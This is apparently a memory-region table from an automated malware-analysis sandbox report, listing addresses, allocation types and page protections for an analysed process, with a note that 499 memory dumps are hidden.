6E4000
|
heap
|
page read and write
|
||
|
2CA17D30000
|
trusted library section
|
page readonly
|
||
|
224FE000
|
stack
|
page read and write
|
||
|
232BE000
|
stack
|
page read and write
|
||
|
2BC0000
|
direct allocation
|
page read and write
|
||
|
2370000
|
heap
|
page read and write
|
||
|
401000
|
unkown
|
page execute read
|
||
|
7400000
|
trusted library allocation
|
page read and write
|
||
|
4BF6000
|
trusted library allocation
|
page read and write
|
||
|
2A60000
|
heap
|
page read and write
|
||
|
8090000
|
heap
|
page read and write
|
||
|
6B60000
|
heap
|
page read and write
|
||
|
DDB487E000
|
unkown
|
page readonly
|
||
|
8060000
|
trusted library allocation
|
page read and write
|
||
|
DF2B000
|
direct allocation
|
page execute and read and write
|
||
|
8650000
|
trusted library allocation
|
page read and write
|
||
|
729C000
|
heap
|
page read and write
|
||
|
88B0000
|
direct allocation
|
page read and write
|
||
|
84A0000
|
heap
|
page read and write
|
||
|
6C6C000
|
heap
|
page read and write
|
||
|
2F20000
|
trusted library allocation
|
page execute and read and write
|
||
|
6D45000
|
heap
|
page read and write
|
||
|
2CA1C2EB000
|
heap
|
page read and write
|
||
|
22E9E000
|
stack
|
page read and write
|
||
|
2C0B000
|
remote allocation
|
page execute and read and write
|
||
|
75B0000
|
trusted library allocation
|
page read and write
|
||
|
408000
|
unkown
|
page readonly
|
||
|
8670000
|
trusted library allocation
|
page execute and read and write
|
||
|
2C00000
|
direct allocation
|
page read and write
|
||
|
278C000
|
stack
|
page read and write
|
||
|
81B0000
|
trusted library allocation
|
page read and write
|
||
|
2CA16C2B000
|
heap
|
page read and write
|
||
|
2CA173F0000
|
trusted library allocation
|
page read and write
|
||
|
2CA17D10000
|
trusted library section
|
page readonly
|
||
|
7238000
|
heap
|
page read and write
|
||
|
7660000
|
trusted library allocation
|
page read and write
|
||
|
2EC8000
|
trusted library allocation
|
page read and write
|
||
|
2CA16B30000
|
heap
|
page read and write
|
||
|
9EE000
|
stack
|
page read and write
|
||
|
22E60000
|
remote allocation
|
page read and write
|
||
|
8F2B000
|
direct allocation
|
page execute and read and write
|
||
|
22E60000
|
remote allocation
|
page read and write
|
||
|
DDB477D000
|
stack
|
page read and write
|
||
|
2D30000
|
heap
|
page read and write
|
||
|
72F2000
|
heap
|
page read and write
|
||
|
434000
|
unkown
|
page read and write
|
||
|
43F000
|
unkown
|
page readonly
|
||
|
6D10000
|
direct allocation
|
page read and write
|
||
|
32F0000
|
heap
|
page read and write
|
||
|
2D68000
|
heap
|
page read and write
|
||
|
378F000
|
unkown
|
page read and write
|
||
|
2CF2000
|
trusted library allocation
|
page read and write
|
||
|
22BBE000
|
stack
|
page read and write
|
||
|
22330000
|
heap
|
page read and write
|
||
|
2FA0000
|
heap
|
page read and write
|
||
|
DDB3579000
|
stack
|
page read and write
|
||
|
2414000
|
heap
|
page read and write
|
||
|
6B5E000
|
stack
|
page read and write
|
||
|
2D5E000
|
stack
|
page read and write
|
||
|
2CA16C5C000
|
heap
|
page read and write
|
||
|
8070000
|
trusted library allocation
|
page read and write
|
||
|
2CA16CA1000
|
heap
|
page read and write
|
||
|
8660000
|
direct allocation
|
page execute and read and write
|
||
|
72D1000
|
heap
|
page read and write
|
||
|
2307E000
|
stack
|
page read and write
|
||
|
2367F000
|
stack
|
page read and write
|
||
|
2A40000
|
heap
|
page read and write
|
||
|
4B03000
|
trusted library allocation
|
page read and write
|
||
|
71C0000
|
heap
|
page read and write
|
||
|
7590000
|
trusted library allocation
|
page read and write
|
||
|
388F000
|
stack
|
page read and write
|
||
|
DDB3D7E000
|
unkown
|
page readonly
|
||
|
35B2000
|
heap
|
page read and write
|
||
|
335D000
|
stack
|
page read and write
|
||
|
8140000
|
trusted library allocation
|
page execute and read and write
|
||
|
6FF000
|
heap
|
page read and write
|
||
|
2B90000
|
direct allocation
|
page read and write
|
||
|
2CA1C4B0000
|
remote allocation
|
page read and write
|
There are 499 hidden memdumps, click here to show them.